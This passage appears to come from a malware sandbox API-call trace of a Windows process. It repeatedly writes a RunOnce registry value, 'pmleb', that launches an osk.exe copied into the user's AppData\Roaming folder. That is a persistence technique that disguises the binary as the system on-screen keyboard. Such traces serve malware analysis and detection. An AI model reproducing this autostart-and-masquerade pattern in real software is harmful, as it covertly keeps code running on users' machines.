(hKey=0x280) returned 0x0 [0108.818] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.818] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.818] SetTimer (hWnd=0x20280, nIDEvent=0x243e, uElapse=0xa, lpTimerFunc=0x0) returned 0x243e [0108.818] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.832] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.832] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.832] KillTimer (hWnd=0x20280, uIDEvent=0x243e) returned 1 [0108.833] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.833] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.833] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.834] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.834] RegCloseKey (hKey=0x280) returned 0x0 [0108.834] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.834] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.834] SetTimer (hWnd=0x20280, nIDEvent=0x243f, uElapse=0xa, lpTimerFunc=0x0) returned 0x243f [0108.834] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.847] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.847] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.847] KillTimer (hWnd=0x20280, uIDEvent=0x243f) returned 1 [0108.848] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.848] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.848] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.849] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.849] RegCloseKey (hKey=0x280) returned 0x0 [0108.849] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.849] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.849] SetTimer (hWnd=0x20280, nIDEvent=0x2440, uElapse=0xa, lpTimerFunc=0x0) returned 0x2440 [0108.849] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.863] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.863] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.863] KillTimer (hWnd=0x20280, uIDEvent=0x2440) returned 1 [0108.863] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.863] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.864] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.864] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.864] RegCloseKey (hKey=0x280) returned 0x0 [0108.864] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.864] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.864] SetTimer (hWnd=0x20280, nIDEvent=0x2441, uElapse=0xa, lpTimerFunc=0x0) returned 0x2441 [0108.864] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.878] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.878] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.878] KillTimer (hWnd=0x20280, uIDEvent=0x2441) returned 1 [0108.879] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.879] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.879] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.879] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.879] RegCloseKey (hKey=0x280) returned 0x0 [0108.880] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.880] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.880] SetTimer (hWnd=0x20280, nIDEvent=0x2442, uElapse=0xa, lpTimerFunc=0x0) returned 0x2442 [0108.880] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.894] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.894] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.894] KillTimer (hWnd=0x20280, uIDEvent=0x2442) returned 1 [0108.894] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.895] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.895] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.895] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.895] RegCloseKey (hKey=0x280) returned 0x0 [0108.895] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.895] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.895] SetTimer (hWnd=0x20280, nIDEvent=0x2443, uElapse=0xa, lpTimerFunc=0x0) returned 0x2443 [0108.896] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.910] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.910] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.910] KillTimer (hWnd=0x20280, uIDEvent=0x2443) returned 1 [0108.910] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.911] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.911] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.911] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.911] RegCloseKey (hKey=0x280) returned 0x0 [0108.912] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.912] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.912] SetTimer (hWnd=0x20280, nIDEvent=0x2444, uElapse=0xa, lpTimerFunc=0x0) returned 0x2444 [0108.912] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.925] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.925] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.925] KillTimer (hWnd=0x20280, uIDEvent=0x2444) returned 1 [0108.926] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.926] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.926] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.927] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.927] RegCloseKey (hKey=0x280) returned 0x0 [0108.927] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.927] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.927] SetTimer (hWnd=0x20280, nIDEvent=0x2445, uElapse=0xa, lpTimerFunc=0x0) returned 0x2445 [0108.927] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.941] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.941] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.941] KillTimer (hWnd=0x20280, uIDEvent=0x2445) returned 1 [0108.941] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.941] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.941] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.942] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.942] RegCloseKey (hKey=0x280) returned 0x0 [0108.942] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.942] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.942] SetTimer (hWnd=0x20280, nIDEvent=0x2446, uElapse=0xa, lpTimerFunc=0x0) returned 0x2446 [0108.942] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.956] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.956] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.956] KillTimer (hWnd=0x20280, uIDEvent=0x2446) returned 1 [0108.957] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.957] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.957] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.957] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.957] RegCloseKey (hKey=0x280) returned 0x0 [0108.958] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.958] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.958] SetTimer (hWnd=0x20280, nIDEvent=0x2447, uElapse=0xa, lpTimerFunc=0x0) returned 0x2447 [0108.958] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.972] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.972] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.972] KillTimer (hWnd=0x20280, uIDEvent=0x2447) returned 1 [0108.972] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.973] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.973] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.973] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.973] RegCloseKey (hKey=0x280) returned 0x0 [0108.973] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.973] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.973] SetTimer (hWnd=0x20280, nIDEvent=0x2448, uElapse=0xa, lpTimerFunc=0x0) returned 0x2448 [0108.973] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0108.988] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0108.988] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0108.988] KillTimer (hWnd=0x20280, uIDEvent=0x2448) returned 1 [0108.988] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.989] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0108.989] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0108.989] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0108.989] RegCloseKey (hKey=0x280) returned 0x0 [0108.989] IUnknown:Release (This=0x7a9740) returned 0x1 [0108.989] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0108.990] SetTimer (hWnd=0x20280, nIDEvent=0x2449, uElapse=0xa, lpTimerFunc=0x0) returned 0x2449 [0108.990] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.003] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.003] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.003] KillTimer (hWnd=0x20280, uIDEvent=0x2449) returned 1 [0109.003] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.004] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.004] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.004] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.004] RegCloseKey (hKey=0x280) returned 0x0 [0109.004] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.004] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.004] SetTimer (hWnd=0x20280, nIDEvent=0x244a, uElapse=0xa, lpTimerFunc=0x0) returned 0x244a [0109.005] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.019] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.019] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.019] KillTimer (hWnd=0x20280, uIDEvent=0x244a) returned 1 [0109.019] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.019] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.020] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.020] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.020] RegCloseKey (hKey=0x280) returned 0x0 [0109.020] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.020] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.020] SetTimer (hWnd=0x20280, nIDEvent=0x244b, uElapse=0xa, lpTimerFunc=0x0) returned 0x244b [0109.020] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.034] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.034] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.035] KillTimer (hWnd=0x20280, uIDEvent=0x244b) returned 1 [0109.035] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.035] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.035] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.035] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.036] RegCloseKey (hKey=0x280) returned 0x0 [0109.036] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.036] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.036] SetTimer (hWnd=0x20280, nIDEvent=0x244c, uElapse=0xa, lpTimerFunc=0x0) returned 0x244c [0109.036] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.050] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.050] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.050] KillTimer (hWnd=0x20280, uIDEvent=0x244c) returned 1 [0109.050] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.051] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.051] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.051] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.051] RegCloseKey (hKey=0x280) returned 0x0 [0109.051] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.051] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.051] SetTimer (hWnd=0x20280, nIDEvent=0x244d, uElapse=0xa, lpTimerFunc=0x0) returned 0x244d [0109.051] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.067] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.067] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.067] KillTimer (hWnd=0x20280, uIDEvent=0x244d) returned 1 [0109.068] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.068] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.068] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.070] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.070] RegCloseKey (hKey=0x280) returned 0x0 [0109.070] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.070] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.071] SetTimer (hWnd=0x20280, nIDEvent=0x244e, uElapse=0xa, lpTimerFunc=0x0) returned 0x244e [0109.071] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.081] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.081] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.081] KillTimer (hWnd=0x20280, uIDEvent=0x244e) returned 1 [0109.081] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.082] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.082] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.082] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.082] RegCloseKey (hKey=0x280) returned 0x0 [0109.082] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.082] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.082] SetTimer (hWnd=0x20280, nIDEvent=0x244f, uElapse=0xa, lpTimerFunc=0x0) returned 0x244f [0109.082] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.097] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.097] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.097] KillTimer (hWnd=0x20280, uIDEvent=0x244f) returned 1 [0109.097] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.097] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.097] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0109.098] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0109.098] RegCloseKey (hKey=0x280) returned 0x0 [0109.098] IUnknown:Release (This=0x7a9740) returned 0x1 [0109.098] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.098] SetTimer (hWnd=0x20280, nIDEvent=0x2450, uElapse=0xa, lpTimerFunc=0x0) returned 0x2450 [0109.098] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0109.112] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0109.112] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0109.113] KillTimer (hWnd=0x20280, uIDEvent=0x2450) returned 1 [0109.113] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0109.113] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0109.113] RegCreateKeyExA (in: 